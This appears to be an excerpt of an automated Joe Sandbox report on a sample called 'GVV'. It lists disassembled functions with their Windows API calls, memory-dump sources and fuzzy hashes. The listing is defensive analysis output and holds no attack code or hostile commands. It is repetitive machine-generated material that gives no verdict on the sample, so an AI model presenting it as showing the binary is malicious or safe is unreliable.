                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 9899a537a88818f4d4b7c18fe7a5c7ef304bec56ad738e8e34d413806425303c
                • Instruction ID: 402e3718f6101e44149e98b83665a9de077d2d7c4364fbe60028596a8ec26151
                • Opcode Fuzzy Hash: 9899a537a88818f4d4b7c18fe7a5c7ef304bec56ad738e8e34d413806425303c
                • Instruction Fuzzy Hash: 0411393AD01219FFEB10DBA8CD85FADBB79EB08750F204091EA04B7290D7716E50DB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                Download Yara Rule
                APIs
                • GetCurrentThreadId.KERNEL32 ref: 0017E1FD
                • MessageBoxW.USER32(?,?,?,?), ref: 0017E230
                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0017E246
                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0017E24D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                • String ID:
                • API String ID: 2880819207-0
                • Opcode ID: 534408f6ead0063f5e8ca86064f9e9277ed8c09d1af500d3baa93e45d60e5340
                • Instruction ID: a6074ec365f34c70a0aacf2ab61e99403dd825153351d5859f9b2fa9e96e02f7
                • Opcode Fuzzy Hash: 534408f6ead0063f5e8ca86064f9e9277ed8c09d1af500d3baa93e45d60e5340
                • Instruction Fuzzy Hash: C6112B76A04254BBC7019FE8AC45A9F7FFDAB45320F148255F819D7691D770CD4087A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0013D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNEL32(00000000,?,0013CFF9,00000000,00000004,00000000), ref: 0013D218
                • GetLastError.KERNEL32 ref: 0013D224
                • __dosmaperr.LIBCMT ref: 0013D22B
                • ResumeThread.KERNEL32(00000000), ref: 0013D249
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Thread$CreateErrorLastResume__dosmaperr
                • String ID:
                • API String ID: 173952441-0
                • Opcode ID: ad1b3673ed51f50614f62d5c7939103c22e71f58c4ee5f3c7374a66c0bdd06fc
                • Instruction ID: 7e1f8a602345248c81447e91dcc7f2b187235de8bb0165a6ed9b19f96eef4c25
                • Opcode Fuzzy Hash: ad1b3673ed51f50614f62d5c7939103c22e71f58c4ee5f3c7374a66c0bdd06fc
                • Instruction Fuzzy Hash: AC01B536805204BBDB215BA5FC09BAF7A6DEF92731F104219F925961D0DF71C945C7E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0011600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0011604C
                • GetStockObject.GDI32(00000011), ref: 00116060
                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0011606A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateMessageObjectSendStockWindow
                • String ID:
                • API String ID: 3970641297-0
                • Opcode ID: 8b570fdf337d094e40930fcf3bf18193f970394df34e2ed2a161592e241c4e12
                • Instruction ID: f8a0de403b1b915c5e4b2764abfd2e68d2b0cdc417f4ce1ff54532d1b3d12b67
                • Opcode Fuzzy Hash: 8b570fdf337d094e40930fcf3bf18193f970394df34e2ed2a161592e241c4e12
                • Instruction Fuzzy Hash: 93116D72501548BFEF168FA49C44EEABBA9EF1D3A4F050225FA1456110D7369CE0DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00133B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • ___BuildCatchObject.LIBVCRUNTIME ref: 00133B56
                  • Part of subcall function 00133AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00133AD2
                  • Part of subcall function 00133AA3: ___AdjustPointer.LIBCMT ref: 00133AED
                • _UnwindNestedFrames.LIBCMT ref: 00133B6B
                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00133B7C
                • CallCatchBlock.LIBVCRUNTIME ref: 00133BA4
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                • String ID:
                • API String ID: 737400349-0
                • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                • Instruction ID: 91ae3b79288af26b182d00447ed5b0d12740e1cf56770c10d1b2144ba44dc5f4
                • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                • Instruction Fuzzy Hash: BE010C32100149BBDF125E95CC46EEB7F6DEF58764F044014FE58A6121C736E961EBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00143073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001113C6,00000000,00000000,?,0014301A,001113C6,00000000,00000000,00000000,?,0014328B,00000006,FlsSetValue), ref: 001430A5
                • GetLastError.KERNEL32(?,0014301A,001113C6,00000000,00000000,00000000,?,0014328B,00000006,FlsSetValue,001B2290,FlsSetValue,00000000,00000364,?,00142E46), ref: 001430B1
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0014301A,001113C6,00000000,00000000,00000000,?,0014328B,00000006,FlsSetValue,001B2290,FlsSetValue,00000000), ref: 001430BF
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 1bfea83f3cf52561bddc6a4c4201b424470e1150b3a912bc3deeb83052604e46
                • Instruction ID: 0030475b80ddb4d34d5f2b97ee03e2d8f646483786823ea783c1d7fb19ea636b
                • Opcode Fuzzy Hash: 1bfea83f3cf52561bddc6a4c4201b424470e1150b3a912bc3deeb83052604e46
                • Instruction Fuzzy Hash: 0201FE32701322EBCB314B799C45A577BD8EF46B71B210720F925E7660D721DD41C6E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00177464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                Download Yara Rule
                APIs
                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0017747F
                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00177497
                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001774AC
                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001774CA
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Type$Register$FileLoadModuleNameUser
                • String ID:
                • API String ID: 1352324309-0
                • Opcode ID: a049ac539d760e64883085b918c533a43b0ffa4b021a3d54b5c3f1c14ee0ccc0
                • Instruction ID: 214ac871a751038080666c12cd4b0de041e3206be02f654178e228a0b71b5cb5
                • Opcode Fuzzy Hash: a049ac539d760e64883085b918c533a43b0ffa4b021a3d54b5c3f1c14ee0ccc0
                • Instruction Fuzzy Hash: F51180B5209315AFE7208F24DC09FA27FFCEB04B04F10C969A65BD6591D7B0E944DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                Download Yara Rule
                APIs
                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0017ACD3,?,00008000), ref: 0017B0C4
                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0017ACD3,?,00008000), ref: 0017B0E9
                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0017ACD3,?,00008000), ref: 0017B0F3
                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0017ACD3,?,00008000), ref: 0017B126
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CounterPerformanceQuerySleep
                • String ID:
                • API String ID: 2875609808-0
                • Opcode ID: 043a3fed7b7268f08cf454c35b6e2d6a2ec32944a488ec373098ba58a2a8d3a1
                • Instruction ID: 56ccbc17683670979464419ff86fec1ec0a40715cc5425b77d4cf4c4cbb7f77a
                • Opcode Fuzzy Hash: 043a3fed7b7268f08cf454c35b6e2d6a2ec32944a488ec373098ba58a2a8d3a1
                • Instruction Fuzzy Hash: DB116171E0952DD7CF04AFE4E9A87EEBB78FF0A711F518085E945B2141CB305591CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A7E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                Download Yara Rule
                APIs
                • GetWindowRect.USER32(?,?), ref: 001A7E33
                • ScreenToClient.USER32(?,?), ref: 001A7E4B
                • ScreenToClient.USER32(?,?), ref: 001A7E6F
                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001A7E8A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClientRectScreen$InvalidateWindow
                • String ID:
                • API String ID: 357397906-0
                • Opcode ID: ef6286c9483443719ac63e49c2fe32e9ecf6ef1393c9f327a2ed1f48e3f8e209
                • Instruction ID: 40240bcdefed34e73d8092870491f58670991457dec4e929656d02f11a7c9006
                • Opcode Fuzzy Hash: ef6286c9483443719ac63e49c2fe32e9ecf6ef1393c9f327a2ed1f48e3f8e209
                • Instruction Fuzzy Hash: 281156B9D0024AAFDB41CFA8C8849EEBBF5FF19310F505056E915E3610D735AA94CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00172DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                Download Yara Rule
                APIs
                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00172DC5
                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00172DD6
                • GetCurrentThreadId.KERNEL32 ref: 00172DDD
                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00172DE4
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                • String ID:
                • API String ID: 2710830443-0
                • Opcode ID: c2f51a7cd597015b4f9aaef0403e2161946fa8a62dfaa5a9eb6fa87365df8f51
                • Instruction ID: 7b1209ab99bf8788fbba94a0ab17c766ff384accc80fa001cf69d1cedb9513ee
                • Opcode Fuzzy Hash: c2f51a7cd597015b4f9aaef0403e2161946fa8a62dfaa5a9eb6fa87365df8f51
                • Instruction Fuzzy Hash: 9AE0ED71601224BAD7245BA2DC0DEEB7E6CEB57BA1F404115F509D15909AA58981C6F0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00129639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00129693
                  • Part of subcall function 00129639: SelectObject.GDI32(?,00000000), ref: 001296A2
                  • Part of subcall function 00129639: BeginPath.GDI32(?), ref: 001296B9
                  • Part of subcall function 00129639: SelectObject.GDI32(?,00000000), ref: 001296E2
                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001A8887
                • LineTo.GDI32(?,?,?), ref: 001A8894
                • EndPath.GDI32(?), ref: 001A88A4
                • StrokePath.GDI32(?), ref: 001A88B2
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                • String ID:
                • API String ID: 1539411459-0
                • Opcode ID: 13c2f351e09bda25f24a4091c9ae260672b59963f870d3c02e2b516e27b733e0
                • Instruction ID: ee17e6e5c7fd362f8d2c9cd1984de1056b826feb59588f4fae0c4b79818e55ca
                • Opcode Fuzzy Hash: 13c2f351e09bda25f24a4091c9ae260672b59963f870d3c02e2b516e27b733e0
                • Instruction Fuzzy Hash: E4F05E3A045258FADB125F94AD0DFCE3F59AF07310F448000FA11654E2CB7955A1CFE9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001298B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                Download Yara Rule
                APIs
                • GetSysColor.USER32(00000008), ref: 001298CC
                • SetTextColor.GDI32(?,?), ref: 001298D6
                • SetBkMode.GDI32(?,00000001), ref: 001298E9
                • GetStockObject.GDI32(00000005), ref: 001298F1
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Color$ModeObjectStockText
                • String ID:
                • API String ID: 4037423528-0
                • Opcode ID: f8819871123ad8b13d53adcf5b74001ad26443795f1b9a892ce9fc98c2298536
                • Instruction ID: 6c2e29f4eb5120b7b6c4555815e836e7a6f12548d129827388167df1066ca1c8
                • Opcode Fuzzy Hash: f8819871123ad8b13d53adcf5b74001ad26443795f1b9a892ce9fc98c2298536
                • Instruction Fuzzy Hash: 12E06D31344280EADB215B78BC0DBE83F61EB5333AF048219F6FA584E1C77246909B10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                Download Yara Rule
                APIs
                • GetCurrentThread.KERNEL32 ref: 00171634
                • OpenThreadToken.ADVAPI32(00000000,?,?,?,001711D9), ref: 0017163B
                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001711D9), ref: 00171648
                • OpenProcessToken.ADVAPI32(00000000,?,?,?,001711D9), ref: 0017164F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CurrentOpenProcessThreadToken
                • String ID:
                • API String ID: 3974789173-0
                • Opcode ID: 4ff39f708ebe65a9c93f1b0f0a640fd1a6783a775ae85d8c6d812caa67de397a
                • Instruction ID: 475c346de15ffebbd9e3dfb024f876253d9d40987fcef70f75cb1fec2b580998
                • Opcode Fuzzy Hash: 4ff39f708ebe65a9c93f1b0f0a640fd1a6783a775ae85d8c6d812caa67de397a
                • Instruction Fuzzy Hash: A4E08635601211EBD7201FB49E0DB473B7CAF56791F148808F245C9080D7744580C790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0016D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                Download Yara Rule
                APIs
                • GetDesktopWindow.USER32 ref: 0016D858
                • GetDC.USER32(00000000), ref: 0016D862
                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0016D882
                • ReleaseDC.USER32(?), ref: 0016D8A3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CapsDesktopDeviceReleaseWindow
                • String ID:
                • API String ID: 2889604237-0
                • Opcode ID: ddafb724391b1749419dc3c803ef6aa8a80b7b9c7854be349fc779521fedafa0
                • Instruction ID: 62aaef06de82f3b5fcec9a3cc0f2b85adf2fe8aa4ec7c3cac5afc5f6feaf8c6d
                • Opcode Fuzzy Hash: ddafb724391b1749419dc3c803ef6aa8a80b7b9c7854be349fc779521fedafa0
                • Instruction Fuzzy Hash: 68E01AB4800205DFCB459FB0E90C66DBBB5FB09310F118019F80AE7750CB388991AF80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0016D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                Download Yara Rule
                APIs
                • GetDesktopWindow.USER32 ref: 0016D86C
                • GetDC.USER32(00000000), ref: 0016D876
                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0016D882
                • ReleaseDC.USER32(?), ref: 0016D8A3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CapsDesktopDeviceReleaseWindow
                • String ID:
                • API String ID: 2889604237-0
                • Opcode ID: 7110f4ac2b596c6a22ef8d97317a1afe528fb8a8a76a7cf951db2dd0c62126ff
                • Instruction ID: a40d41c941a1733fb426669f8209a441d6baccc732f411517f131ead27bc42ea
                • Opcode Fuzzy Hash: 7110f4ac2b596c6a22ef8d97317a1afe528fb8a8a76a7cf951db2dd0c62126ff
                • Instruction Fuzzy Hash: D0E01A74800204DFCB419FB0D80866DBBB1BB08310B108008F80AE7750CB3899819F80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00184D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00117620: _wcslen.LIBCMT ref: 00117625
                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00184ED4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Connection_wcslen
                • String ID: *$LPT
                • API String ID: 1725874428-3443410124
                • Opcode ID: f85e36f7d977511c86d224cce77498cce239b9e74f7877b944322b3f0d1ea6e6
                • Instruction ID: f016797c7d74213da8378e2b502662828f4c3dcbe3f06632964baad3c0cf6902
                • Opcode Fuzzy Hash: f85e36f7d977511c86d224cce77498cce239b9e74f7877b944322b3f0d1ea6e6
                • Instruction Fuzzy Hash: E3914E75A002059FCB14EF58C484EAABBF1AF45304F15809DE54A9F3A2DB35EE85CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0012E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: #
                • API String ID: 0-1885708031
                • Opcode ID: 0355a87ea2f9d576841bc39f8e7272ad2d60cb6887b454ad2782e73d9423ab0b
                • Instruction ID: c0894f0475ce737f855c2d36bd601edadffdd342c0167f30a91a470c4e26594d
                • Opcode Fuzzy Hash: 0355a87ea2f9d576841bc39f8e7272ad2d60cb6887b454ad2782e73d9423ab0b
                • Instruction Fuzzy Hash: 90513339504256DFDF18DF68D881AFA7BE8EF26310F244115F8929B2C0D7349DA2CBA0
                Uniqueness

                Uniqueness Score: -1.00%

